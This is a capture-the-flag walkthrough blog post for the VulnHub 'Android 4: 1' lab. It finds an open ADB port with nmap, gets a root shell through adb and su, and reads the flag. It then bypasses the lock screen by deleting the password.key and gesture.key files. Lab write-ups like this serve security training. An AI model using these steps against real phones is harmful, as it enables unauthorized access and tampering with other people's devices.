CTF · Vulnhub

Android 4: 1

admin

Setup Vulhub Machine: –

  1. First, we have to Download the Mirror image from VulnHub. (https://www.vulnhub.com/entry/android4-1,233/)
  2. Open Virtual Box and click on Import and then select the downloaded file.
  3. Once You import successfully, You can now set the interface to Vbox guest addition. This process will help you in the Enumeration phase.
  4. On completion, Check if the Network Adapter is set to Host-only adapter, or not.

Once you are done with the settings up, let’s start the virtual machine.

The instance is ready, and we have got a UI that asks us to input a password. 

Our task will be to find the flag, and also will unlock the password screen.

The Walkthrough: – 

Step 1:- (Enumeration) 

The instances are ready and we are on Kali Linux. Let’s find out the IP address of the Mercury server by using netdiscover.

find out the target IP address using NetDiscover.

┌─(rootharsh㉿kali)-[~] 

└─$ sudo netdiscover -i eth0 

We have discovered an IP address, so let’s Perform a network scan to detect what ports are open. It is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.

  • -sC: Performs a script scan using the default set of scripts. 
  • -sV: Enables version detection, which will detect what versions are running on what port.
┌──(rootharsh㉿kali)-[~]
└─$ nmap -sC -sV 192.168.56.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 12:25 IST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.109
Host is up (0.00053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
5555/tcp open  freeciv?
8080/tcp open  http     PHP cli server 5.5 or later
|_http-title: Deface by Good Hackers
|_http-open-proxy: Proxy might be redirecting requests

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.68 seconds
                                                                                                      
┌──(rootharsh㉿kali)-[~]
└─$

From the network scan, we have spotted 2 open ports.

  • Port 5555/TCP seems to be like a Freeciv gaming protocol.
  • Port 8080/TCP running an HTTP service, which indicates that there might be a website running.

To look at the contents ourselves, we can open a web browser of our choice and navigate to the target’s IP address along with the port 8080 in the URL bar at the top of the window.

Step 2:- (Foothold)

Anyone would establish that there is some kind of verbal tampering involved in using the POST method. We tried but didn’t find anything useful. It seems to be like an information page. Let’s brute force the directory and URL using gobuster. 

┌──(rootharsh㉿kali)-[~]
└─$ gobuster dir -u http://192.168.56.109:8080 -w /usr/share/wordlists/dirb/common.txt

We found nothing from the result. From the Nmap result, we have discovered port 5555 is in an open state. After analyzing, I confirmed that the android device might be connected through the ADB command-line utility. If you don’t know what is ADB? (https://developer.android.com/studio/command-line/adb)

Firstly open a terminal and check if there ADB command-line utility is already installed or not. If not then install it .

┌──(rootharsh㉿kali)-[~]
└─$ sudo apt-get install adb

To get to connect the Android device through the network:

┌──(rootharsh㉿kali)-[~]
└─$ adb connect 192.168.56.109:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.56.109:5555
                                                                                                                                                                                                                                       
┌──(rootharsh㉿kali)-[~]
└─$

On successful execution, you can list the connected devices using ADB devices. As you can see, we have successfully managed to get into the server.

┌──(rootharsh㉿kali)-[~]
└─$ adb devices
List of devices attached
192.168.56.109:5555     device

                                                                                                
┌──(rootharsh㉿kali)-[~]
└─$

To get interaction with the shell use the ADB-shell command where you can perform Linux commands to get the flag.

┌──(rootharsh㉿kali)-[~]
└─$ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcar
uid=0(root) gid=0(root)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ #

Step 3:- (Privilege Escalation)

We have successfully managed to escalate to the highest privilege. You can find the root flag to complete the challenge.

┌──(rootharsh㉿kali)-[~]
└─$ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcar
uid=0(root) gid=0(root)@x86:/ # cd /data/root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
ANDROID{u_GOT_root_buddy}
uid=0(root) gid=0(root)@x86:/data/root #

Congratulation on the completion of capturing the flag. Let’s see if we could remove the lock screen password using ADB. So firstly change the directory to the previous directory which is a data directory.  From here change the directory to the system, and list all files and directories. 

uid=0(root) gid=0(root)@x86:/data/root # cd ..
uid=0(root) gid=0(root)@x86:/data # cd system
uid=0(root) gid=0(root)@x86:/data/system # ls
appops.xml
batterystats.bin
called_pre_boots.dat
device_policies.xml
dropbox
entropy.dat
framework_atlas.config
gesture.key
ifw
inputmethod
locksettings.db
locksettings.db-shm
locksettings.db-wal
ndebugsocket
netstats
packages.list
packages.xml
password.key
procstats
registered_services
shared_prefs
sync
uiderrors.txt
usagestats
users
uid=0(root) gid=0(root)@x86:/data/system #

The keys are stored within the file which contains the “.key” extension.

uid=0(root) gid=0(root)@x86:/data/system # cat password.key
68683BEA625263C8F04CBBC88D13233FBD2B6B875C707BC04B48AD1AD1733F739969F9D7uid=0(root) gid=0(root)@x86:/data/system # rm *.key 
uid=0(root) gid=0(root)@x86:/data/system #

The key files are removed.  Reboot the device to see the magic. 

uid=0(root) gid=0(root)@x86:/data/system # cat password.key
68683BEA625263C8F04CBBC88D13233FBD2B6B875C707BC04B48AD1AD1733F739969F9D7uid=0(root) gid=0(root)@x86:/data/system # rm *.key 
uid=0(root) gid=0(root)@x86:/data/system # reboot

We have successfully managed to bypass the lock screen.

Leave a Reply

Your email address will not be published. Required fields are marked *